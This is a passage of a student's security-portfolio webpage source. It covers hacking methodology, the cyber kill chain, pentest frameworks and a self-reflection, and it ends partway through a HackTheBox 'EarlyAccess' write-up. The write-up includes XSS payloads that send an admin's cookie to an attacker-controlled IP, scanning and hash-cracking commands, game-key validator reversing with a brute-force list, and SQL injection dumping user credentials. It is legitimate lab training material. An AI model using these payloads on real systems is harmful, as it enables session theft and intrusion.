          <p>It is quite logical that companies don't prosecute these people and give them rewards
          instead, because if you think about it they will lose far less money when they pay these
          rewards then if they get hacked by a real threat. Looking at <a href="https://www.bugcrowd.com/bug-bounty-list/">this</a> website a lot of
          companies share that same ideology.</p>
          <ul class="list-inline">
          <li>Date: December 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Law, Ethics and Responsible Disclosure</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal17" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Basic hacking process</p>
          <p>First lets talk about the basic hacking process. This is a process most hackers will
          follow when conducting a hack, good or bad. Though good and bad use this process there
          is a key difference between the two.</p>
          <a href="../../img/portfolio/red/hackingstappen.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/hackingstappen.png" alt=""></a>
          <p>These are the basic hacking steps that are needed to conduct a good hack.</p>
          <h3>Intel Gathering</h3>
          <p>Intel gathering is the first step in the basic hacking process. In this step the hacker
          tries to gain as much information on his target as possible. He'll conduct for instance
          a OSINT, go to the physical location of his target and get a feel for the place and
          maybe even use social engineering to call his target and try to extract information.</p>
          <h3>Footprint</h3>
          <p>Now the hacker will conduct a network scan and try to gain as much information on the
          target's network as possible. He needs to find a foothold from which he can continue
          further, think about ip ranges, open ports, OS versions and important servers.</p>
          <h3>Vuln Analysis</h3>
          <p>The hacker will now look for any out of date software or operating systems to use
          exploits on. Whenever he'll find a software version he'll look if there's a CVE entry
          for that he could exploit. He might also use some automated tools to find common
          vulnerabilities for him. The hacker will also try any website for web vulnerabilities
          like SQL injection, command injection, CSRF and XSS.</p>
          <h3>Exploitation</h3>
          <p>Now is time for action. The hacker will use the information and vulnerabilities he found
          in the previous step to use his exploits. Thus gaining access to his target or the
          information he's after. Most ethical hackers/pentesters will stop after this step or not
          even do this step at all because it might result in destabilizing or shutting down the
          targets network.</p>
          <h3>Post Exploitation</h3>
          <p>This step and the following is more applicable to the bad actors out there. Here the
          hacker will extract the data he's after, edit some data, create new accounts and setup
          persistence for a backdoor so he can come back later without going through the same
          process again or have the risk of the target patching the vulnerability he used.</p>
          <h3>Clean Up</h3>
          <p>This step is very important for bad actors to not get caught. Here the hacker will try to
          remove all of his footsteps like logs. Therefore the police or target will not be able
          to track him down or even know what he did in the first place.</p>
          <a href="../../img/portfolio/red/Cyber-Kill-Chain.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/Cyber-Kill-Chain.png" alt=""></a>
          <p>Now this is the cyber kill chain even though it's comparable to the basic hacking process
          there are some differences.</p>
          <h3>Reconnaissance</h3>
          <p>Here the hacker will conduct recon comparable to the intel gathering stage in the basic
          hacking process.</p>
          <h3>Weaponization</h3>
          <p>In this step the hacker is already creating a payload with an exploit to attack his
          target. It is notable that in the cyber killchain they skip the footprint and vuln
          analysis stages.</p>
          <h3>Delivery</h3>
          <p>Now the payload is to be delivered to the target this can be done by phising email,
          rubber ducky and so on. This stage is also not present in the basic hacking process,
          there it's more part of the exploitation stage.</p>
          <h3>Exploitation</h3>
          <p>When the payload is delivered the hacker will activate his attack.</p>
          <h3>Installation</h3>
          <p>In this stage the hacker will install for example malware to create persistence for a
          backdoor or to act more stealthy. This would happen in the post exploitation stage in
          the basic hacking process.</p>
          <h3>Command & Control</h3>
          <p>Now the installed malware will call back to the command and control system and give the
          hacker control of the hacked system. This can be both part of the exploitation and post
          exploitation stage in the basic hacking process.</p>
          <h3>Actions on Objectives</h3>
          <p>Here the hacker will do whatever his intentions were.</p>
          <h4>The minimal requirements for a good pentest contract and pentest report</h4>
          <p>In a good pentest contract there should be a clearly defined scope and procedures in case
          of emergency. The contract should also include a confidentiality agreement. The pentest
          report should include the scope and goal of the project with the findings and how it was
          done. It should be explained very carefully and readable for people that weren't aware
          of the project. The most important thing is ofcourse the advice to give to the company,
          this way they'll be able to fix any security leaks and the pentest was a success.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Basic hacking process</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal18" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Self reflection</p>
          <p>The semester started quite slowly for me. It wasn't really clear for me were I should
          start and were I should look for the right information. This semester was quite
          different from the defending one. In the defending semester everything went quite easy
          and smooth and I had a clear goal that I wanted to achieve, I felt like I missed that
          this semester, hens why it didn't start so smoothly.</p>
          <p>I started this semester with absolutely no knowledge in hacking into things. I learned
          quite a lot this semester, must of the things I learned listening to podcasts and
          understanding the different concepts and trying different things on DVWA.</p>
          <p>I still don't really feel like I could actually conduct a good pentest and find some
          decent results after this semester which I think sucks, because I feel like I should. I
          do think I've the knowledge but I feel like I lack the How-to. I did think I would be
          quite good at defending a network and building one after previous semester, so I think
          it's a combination between a lack of goals and guidance.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Self reflection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal19" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Cyber4Z</h2>
          <p class="item-intro text-muted">My internship at Cyber4Z</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: June 2021</li>
          <li>Client: Cyber4Z</li>
          <li>Category: Internship</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal20" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Pen-testing methodologies</p>
          <p>The standard and most popular pentest methodology is the Lockheed Martin cyber killchain.
          It's a basic process that explains the order of action a criminal hacker would follow.
          Thus also making it a viable ethical hacker methodology.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png" alt=""></a>
          <p>Knowing what step a attacker is taking or needs to take is good to know. But it's also
          good to know how to mitigate or prevent each step of the cyber killchain.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg" alt=""></a>
          <p>Other than the Lockheed Martin cyber killchain there are a few other
          frameworks/methodologies, like the well-known OWASP.</p>
          <ol>
          <li>OSSTMM (Open Source Security Testing Methodology Manual)</li>
          <li>OWASP (Open Web Application Security Project)</li>
          <li>NIST (The National Institute of Standards and Technology)</li>
          <li>PTES (Penetration Testing Methodologies and Standards)</li>
          <li>ISSAF (Information System Security Assessment Framework)</li>
          </ol>
          <a href="https://www.vumetric.com/blog/top-penetration-testing-methodologies/">Source</a>
          <p><b>OSSTMM</b> is a peer-reviewed security assessment standard for testing and auditing
          systems and providing them with a risk score</p>
          <p><b>OWASP</b> is used as a methodology to pentest websites and web applications.</p>
          <p><b>NIST</b> is a very strict standard and they promote themselves as functionality
          driven. They mainly focus on helping federal agencies comply with regulations.</p>
          <p><b>PTES</b> is a structured approach to pentesting and looks a lot like the Lockheed
          Martin cyber killchain.</p>
          <p><b>ISSAF</b> is a pentesting methodology where the pentester imitates a hacker. This also
          looks a lot like the Lockheed Martin cyber killchain.</p>
          <p>Apart from all these methodologies there's another well known entity known by not only
          red teamers but also well-known by the blue teamers. This framework is known as the <a href="https://attack.mitre.org/">Mitre ATT&CK Framework</a> this framework
          contains almost every possible way to attack a network or machine.</p>
          <p>I've used the Mitre ATT&CK framework a lot when monitoring the SOC in my home network.
          Wazuh automatically categorizes the incoming alert in the Mitre ATT&CK framework. On the
          opposite side from te red teamer perspective I've used OWASP and the Lockheed Martin
          cyber killchain a lot. Mostly when performing pentests but also when cracking machines
          on Hackthebox and when participating in CTF events.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal21" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Linux Write-up</p>
          <a href="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <code>sudo nmap -v -A -sS earlyaccess.htb</code>
          <a href="img/portfolio/minor/red/htb_linux/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/NMapOutput.png" alt=""></a>
          <p>From the scan we can see that port 80 (http), 443 (https) and 22 (ssh) are open. Nothing
          special to see here really. Maybe we'll have more luck in finding something with
          GoBuster.</p>
          <code>gobuster dir -x 'php, xml, html, js, css, txt, md' -u earlyaccess.htb -w
          /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/GoBusterOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GoBusterOutput.png" alt=""></a>
          <p>From the looks of it all the tries get redirected and these are all false positives.
          Let's try Ffuf as a last enumeration method in order to find hidden subdomains.</p>
          <code>ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://earlyaccess.htb -H "Host:
          FUZZ.earlyaccess.htb" -mc 200</code>
          <a href="img/portfolio/minor/red/htb_linux/FfufOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FfufOutput.png" alt=""></a>
          <p>Looks like we got a few interesting hits. So I'll add those to my /etc/Hosts file so we
          can take a look at them later on. So let's create a test account on the main page and
          let's see what we can find.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png" alt=""></a>
          <p>Interesting we can see a messaging service, a forum, a store and a place to register a
          key. We can also edit our own account. Let's take a look at the forum.</p>
          <a href="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png" alt=""></a>
          <p>Some guy on the forum told the staff that his username caused an issue on the scoreboard,
          and because his username is SingleQuoteMan I feel like this is a nod towards either XSS
          or SQLI. We can probably steal a cookie from the admin if we use XSS in our username,
          because it will run when we message a staff member for support.</p>
          <a href="img/portfolio/minor/red/htb_linux/SendingMessage.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SendingMessage.png" alt=""></a>
          <p>Now we'll just need to find a XSS script that will steal the cookie for us so we can use
          it. I tried a fair number of PHP cookie stealers but with out any luck.</p>
          <p> I tried to follow this guide <a href="https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/">https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/</a>
          and tried a number of different XSS scripts.
          </p>
          <code class="prettyprint">&#x3C;img src=x onerror=this.src='http://10.10.14.40:8888/'</code>
          <a href="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png" alt=""></a>
          <code class="prettyprint">&#x3C;iframe src=http://10.10.14.40:8888/shell.php height=”0”
          width=”0”>&#x3C;/iframe></code>
          <p>But none of these worked. I did manage to steal my own cookie but when I tried stealing
          the admin's I get an "Unsupported ssl" error. So I probably have to make the cookie
          stealer server run on https. But before that I wanted to try to steal it one more time
          without using Java Springboot.</p>
          <a href="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png" alt=""></a>
          <p>It was a longshot but worth the try because Springboot does a lot of stuff underwater and
          it just works most of the time. I used another XSS script as well because the other ones
          spammed my terminal full of bogus output.</p>
          <code class="prettyprint">&#x3C;script>document.location="http://10.10.14.88:8888/cookie?c="
          +
          document.cookie&#x3C;/script></code>
          <a href="img/portfolio/minor/red/htb_linux/AdminCookieJava.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AdminCookieJava.png" alt=""></a>
          <p>And this worked! We got the admin cookie now all that's left is to change our cookie to
          the admin's and refresh the page!</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png" alt=""></a>
          <p>We are logged in as admin but now what? From the looks of it we got a few new tabs in the
          navbar. Game and Dev are the subdomains we've already found but admin could be
          interesting.</p>
          <a href="img/portfolio/minor/red/htb_linux/ValidateAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ValidateAPI.png" alt=""></a>
          <p>It is an admin panel mostly used to validate game keys.</p>
          <a href="img/portfolio/minor/red/htb_linux/GameKeyForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GameKeyForum.png" alt=""></a>
          <p>If we look back at the forum we can see that they are having trouble validating the game
          keys and that they resorted to an offline manual method. Let's download the offline key
          validator and see what we can find.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          #!/usr/bin/env python3
                                          import sys
                                          from re import match
          
                                          class Key:
                                          key = ""
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
          
                                          def __init__(self, key:str, magic_num:int=346):
                                          self.key = key
                                          if magic_num != 0:
                                          self.magic_num = magic_num
          
                                          @staticmethod
                                          def info() -> str:
                                          return f"""
                                          # Game-Key validator #
          
                                          Can be used to quickly verify a user's game key, when the API is down (again).
          
                                          Keys look like the following:
                                          AAAAA-BBBBB-CCCC1-DDDDD-1234
          
                                          Usage: {sys.argv[0]}
                                          &#x3C;game-key&#x3E;"""
          
                                              def valid_format(self) -> bool:
                                              return
                                              bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                              self.key))
          
                                              def calc_cs(self) -> int:
                                              gs = self.key.split('-')[:-1]
                                              return sum([sum(bytearray(g.encode())) for g in gs])
          
                                              def g1_valid(self) -> bool:
                                              g1 = self.key.split('-')[0]
                                              r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                              if r != [221, 81, 145]:
                                              return False
                                              for v in g1[3:]:
                                              try:
                                              int(v)
                                              except:
                                              return False
                                              return len(set(g1)) == len(g1)
          
                                              def g2_valid(self) -> bool:
                                              g2 = self.key.split('-')[1]
                                              p1 = g2[::2]
                                              p2 = g2[1::2]
                                              return sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
          
                                              def g3_valid(self) -> bool:
                                              # TODO: Add mechanism to sync magic_num with API
                                              g3 = self.key.split('-')[2]
                                              if g3[0:2] == self.magic_value:
                                              return sum(bytearray(g3.encode())) == self.magic_num
                                              else:
                                              return False
          
                                              def g4_valid(self) -> bool:
                                              return [ord(i)^ord(g) for g, i in zip(self.key.split('-')[0],
                                              self.key.split('-')[3])] == [12, 4, 20, 117, 0]
          
                                              def cs_valid(self) -> bool:
                                              cs = int(self.key.split('-')[-1])
                                              return self.calc_cs() == cs
          
                                              def check(self) -> bool:
                                              if not self.valid_format():
                                              print('Key format invalid!')
                                              return False
                                              if not self.g1_valid():
                                              return False
                                              if not self.g2_valid():
                                              return False
                                              if not self.g3_valid():
                                              return False
                                              if not self.g4_valid():
                                              return False
                                              if not self.cs_valid():
                                              print('[Critical] Checksum verification failed!')
                                              return False
                                              return True
          
                                              if __name__ == "__main__":
                                              if len(sys.argv) != 2:
                                              print(Key.info())
                                              sys.exit(-1)
                                              input = sys.argv[1]
                                              validator = Key(input)
                                              if validator.check():
                                              print(f"Entered key is valid!")
                                              else:
                                              print(f"Entered key is invalid!")
                                      </code>
                                      </pre>
           <p>This is the original code it looks like they validate the key in parts so if we can
          reverse engineer these parts we can find out how to crack the key.</p>
          <a href="img/portfolio/minor/red/htb_linux/PythonCompiler.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PythonCompiler.png" alt=""></a>
          <p>I put the Python code in an online compiler and removed all the functions and made it
          into a script. Then I put all the results in variables so we can see if a try is
          valid.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          from re import match
          
                                          class Key:
                                          key = "KEY01-0H0H0-XPAA0-GAME1-1295" #defaultkey=AAAAA-BBBBB-CCCC1-DDDDD-1234
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
                                          valid = False
                                          cs_value = 0
                                          cs_valid = False
                                          g1_valid = False
                                          g2_valid = False
                                          g3_valid = False
                                          g4_valid = False
          
                                          valid =
                                          bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                          key))
                                          print("valid_format: ", valid)
          
                                          gs = key.split('-')[:-1]
                                          cs_value = sum([sum(bytearray(g.encode())) for g in gs])
                                          print("cs_value: ", cs_value)
          
                                          ### g1 discovered by changing the first 3 characters untill the r value matched
                                          g1 = key.split('-')[0]
                                          r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                          print("r: ", r)
                                          if r != [221, 81, 145]:
                                          g1_valid = False
                                          for v in g1[3:]:
                                          try:
                                          int(v)
                                          except:
                                          g1_valid = False
                                          g1_valid = len(set(g1)) == len(g1)
                                          print("g1_valid: ", g1_valid)
          
                                          ### g2 discovered by putting p1 on 0 and shifting p2 until it matched
                                          g2 = key.split('-')[1]
                                          p1 = g2[::2]
                                          p2 = g2[1::2]
                                          g2_valid = sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
                                          print("g2_valid: ", g2_valid)
          
                                          # TODO: Add mechanism to sync magic_num with API
                                          g3 = key.split('-')[2]
                                          if g3[0:2] == magic_value:
                                          g3_valid = sum(bytearray(g3.encode())) == magic_num
                                          else:
                                          g3_valid = False
                                          print("g3_valid: ", g3_valid)
          
                                          ### Same approach as g1 try different values untill they matched
                                          print("g4: ", [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])])
                                          g4_valid = [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])] == [12,
                                          4, 20, 117, 0]
                                          print("g4_valid: ", g4_valid)
          
                                          ### The CS value is just a byte sum of the whole key so this has to be the last value to
                                          crack and is pretty easy because we can just print the real CS value and match it
                                          cs = int(key.split('-')[-1])
                                          print("cs: ", cs)
                                          cs_valid = cs_value == cs
                                          print("cs_valid: ", cs_valid)
          
                                          def check(self) -> bool:
                                          if not self.valid_format():
                                          print('Key format invalid!')
                                          return False
                                          if not self.g1_valid():
                                          return False
                                          if not self.g2_valid():
                                          return False
                                          if not self.g3_valid():
                                          return False
                                          if not self.g4_valid():
                                          return False
                                          if not self.cs_valid():
                                          print('[Critical] Checksum verification failed!')
                                          return False
                                          return True
                                      </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png" alt=""></a>
          <p>We cracked the code but the only thing that didn't work is part G3 because the magic
          number seems to be different on the server. When we try to validate it locally using the
          original validator script the key is valid. But maybe we can bruteforce this magic
          number using Burpsuite. There are only 60 possible combinations because the magic number
          is a sum of the last 3 characters, because the code said that the first two "XP" are
          static, And each character has a specific value. So I made a list.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          KEY01-0H0H0-XPAA0-GAME1-1295
                                          KEY01-0H0H0-XPAB0-GAME1-1296
                                          KEY01-0H0H0-XPAC0-GAME1-1297
                                          KEY01-0H0H0-XPAD0-GAME1-1298
                                          KEY01-0H0H0-XPAE0-GAME1-1299
                                          KEY01-0H0H0-XPAF0-GAME1-1300
                                          KEY01-0H0H0-XPAG0-GAME1-1301
                                          KEY01-0H0H0-XPAH0-GAME1-1302
                                          KEY01-0H0H0-XPAI0-GAME1-1303
                                          KEY01-0H0H0-XPAJ0-GAME1-1304
                                          KEY01-0H0H0-XPAK0-GAME1-1305
                                          KEY01-0H0H0-XPAL0-GAME1-1306
                                          KEY01-0H0H0-XPAM0-GAME1-1307
                                          KEY01-0H0H0-XPAN0-GAME1-1308
                                          KEY01-0H0H0-XPAO0-GAME1-1309
                                          KEY01-0H0H0-XPAP0-GAME1-1310
                                          KEY01-0H0H0-XPAQ0-GAME1-1311
                                          KEY01-0H0H0-XPAR0-GAME1-1312
                                          KEY01-0H0H0-XPAS0-GAME1-1313
                                          KEY01-0H0H0-XPAT0-GAME1-1314
                                          KEY01-0H0H0-XPAU0-GAME1-1315
                                          KEY01-0H0H0-XPAV0-GAME1-1316
                                          KEY01-0H0H0-XPAW0-GAME1-1317
                                          KEY01-0H0H0-XPAX0-GAME1-1318
                                          KEY01-0H0H0-XPAY0-GAME1-1319
                                          KEY01-0H0H0-XPAZ0-GAME1-1320
                                          KEY01-0H0H0-XPBZ0-GAME1-1321
                                          KEY01-0H0H0-XPCZ0-GAME1-1322
                                          KEY01-0H0H0-XPDZ0-GAME1-1323
                                          KEY01-0H0H0-XPEZ0-GAME1-1324
                                          KEY01-0H0H0-XPFZ0-GAME1-1325
                                          KEY01-0H0H0-XPGZ0-GAME1-1326
                                          KEY01-0H0H0-XPHZ0-GAME1-1327
                                          KEY01-0H0H0-XPIZ0-GAME1-1328
                                          KEY01-0H0H0-XPJZ0-GAME1-1329
                                          KEY01-0H0H0-XPKZ0-GAME1-1330
                                          KEY01-0H0H0-XPLZ0-GAME1-1331
                                          KEY01-0H0H0-XPMZ0-GAME1-1332
                                          KEY01-0H0H0-XPNZ0-GAME1-1333
                                          KEY01-0H0H0-XPOZ0-GAME1-1334
                                          KEY01-0H0H0-XPPZ0-GAME1-1335
                                          KEY01-0H0H0-XPQZ0-GAME1-1336
                                          KEY01-0H0H0-XPRZ0-GAME1-1337
                                          KEY01-0H0H0-XPSZ0-GAME1-1338
                                          KEY01-0H0H0-XPTZ0-GAME1-1339
                                          KEY01-0H0H0-XPUZ0-GAME1-1340
                                          KEY01-0H0H0-XPVZ0-GAME1-1341
                                          KEY01-0H0H0-XPWZ0-GAME1-1342
                                          KEY01-0H0H0-XPXZ0-GAME1-1343
                                          KEY01-0H0H0-XPYZ0-GAME1-1344
                                          KEY01-0H0H0-XPZZ0-GAME1-1345
                                          KEY01-0H0H0-XPZZ1-GAME1-1346
                                          KEY01-0H0H0-XPZZ2-GAME1-1347
                                          KEY01-0H0H0-XPZZ3-GAME1-1348
                                          KEY01-0H0H0-XPZZ4-GAME1-1349
                                          KEY01-0H0H0-XPZZ5-GAME1-1350
                                          KEY01-0H0H0-XPZZ6-GAME1-1351
                                          KEY01-0H0H0-XPZZ7-GAME1-1352
                                          KEY01-0H0H0-XPZZ8-GAME1-1353
                                          KEY01-0H0H0-XPZZ9-GAME1-1354
                                      </code>
                                      </pre>
          <p>First we need to intercept to post so we can copy it.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png" alt=""></a>
          <p>Now we can send it to the intruder to start brute-forcing this magic number.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png" alt=""></a>
          <p>I've added the payload which is the list of possible combinations we've just compiled.
          Now we need to add it into the POST.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png" alt=""></a>
          <p>Now let's start attacking!</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png" alt=""></a>
          <p>That didn't go as planned it looks like all the requests got redirected let's look at the
          settings if we can change anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png" alt=""></a>
          <p>Looks like Burpsuite just needed to be allowed to follow redirects. This is probably also
          the reason why our first GoBuster attempt failed.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png" alt=""></a>
          <p>Now to second attack is way more promising. One key stands out because the response
          length is different from the rest. Let's try that key and see what happens.</p>
          <a href="img/portfolio/minor/red/htb_linux/KeyValidationTest.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/KeyValidationTest.png" alt=""></a>
          <p>And it worked! Now lets go back to our normal user account and add this key to our
          account.</p>
          <a href="img/portfolio/minor/red/htb_linux/AddKeyToUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AddKeyToUser.png" alt=""></a>
          <p>Now we got the key added to our account we can take a look at that game subdomain we
          found earlier.</p>
          <a href="img/portfolio/minor/red/htb_linux/Scoreboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Scoreboard.png" alt=""></a>
          <p>Something I noticed instantly is the scoreboard that the SingleQuoteMan talked about on
          the forum. Maybe we can do the same trick with SQLI as we did with XSS at the beginning.
          We can do a simple SQLI test to find out if it's vulnerable.</p>
          <a href="img/portfolio/minor/red/htb_linux/VulnForSQLI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/VulnForSQLI.png" alt=""></a>
          <p>It is vulnerable but we didn't match the columns hence why it didn't show any output so
          lets try that again.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLVersion.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLVersion.png" alt=""></a>
          <p>Now look at that this should be easy. Lets try to enumerate the database tables.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIDBDump.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIDBDump.png" alt=""></a>
          <p>A user table? Very interesting lets see if it contains any passwords or usernames.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIUsers.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIUsers.png" alt=""></a>
           <p>And it does! Looks like we got an admin username and a password hash we need to crack.
          But first lets find out what type of hash it is.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashIdentifier.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashIdentifier.png" alt=""></a>
          <p>Looks like it's a SHA1 hash lets see if Hashcat can find the password for us.</p>
          <code>hashcat -a 0 -m 100 adminhash.txt /usr/share/wordlists/rockyou.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/Hashcat.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Hashcat.png" alt=""></a>
          <p>Yes it can! Now lets try to use these credentials to log into the dev subdomain.</p>
